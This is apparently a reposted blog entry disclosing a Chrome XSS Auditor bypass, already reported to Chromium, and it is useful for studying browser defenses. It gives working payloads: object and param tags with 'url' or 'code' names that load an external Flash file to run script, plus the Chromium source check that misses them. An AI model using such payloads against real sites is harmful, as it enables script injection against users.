欢迎光临
我们一直在努力
"

XSS Auditor bypass using obscure tag

Hi there!
I just found an XSS Auditor bypass by accident when I read Chromium’s code for the another reason.
In this short post, I’d like to share this bypass. I confirmed that it works on Chrome Canary 57.
I have already reported here: https://bugs.chromium.org/p/chromium/issues/detail?id=676992

The bypass is:

https://vulnerabledoma.in/char_test?body=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=https://l0.cm/xss.swf%3E

<object allowscriptaccess=always>
<param name=url value=https://l0.cm/xss.swf>

Also it works:

https://vulnerabledoma.in/char_test?body=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=code%20value=https://l0.cm/xss.swf%3E

<object allowscriptaccess=always>
<param name=code value=https://l0.cm/xss.swf>

I didn’t know that Chrome supports such params until I found it in the HTMLObjectElement.cpp:

if (url.isEmpty() && urlParameter.isEmpty() &&
(equalIgnoringCase(name, “src”) || equalIgnoringCase(name, “movie”) ||
equalIgnoringCase(name, “code”) || equalIgnoringCase(name, “url”)))
urlParameter = stripLeadingAndTrailingHTMLSpaces(p->value());

The <param name="src" value="//attacker/xss.swf"> and <param name="movie" value="//attacker/xss.swf"> are blocked by XSS Auditor. But I noticed that code and url are not blocked. Using this, we can load Flash and execute the JavaScript. According to the source code’s comment, it seems Chrome supports this for compatibility. But at least I confirmed it does not work on IE/Edge and Firefox. I think Chrome can remove this support 🙂

That’s it. I wrote about XSS Auditor bypass using <param>. Thanks for reading!

转载请注明: 转载自Legend‘s BLog

本文链接地址: XSS Auditor bypass using obscure tag



未经允许不得转载:Legend‘s BLog » XSS Auditor bypass using obscure tag

分享到:更多 ()

评论 抢沙发

无觅相关文章插件,快速提升流量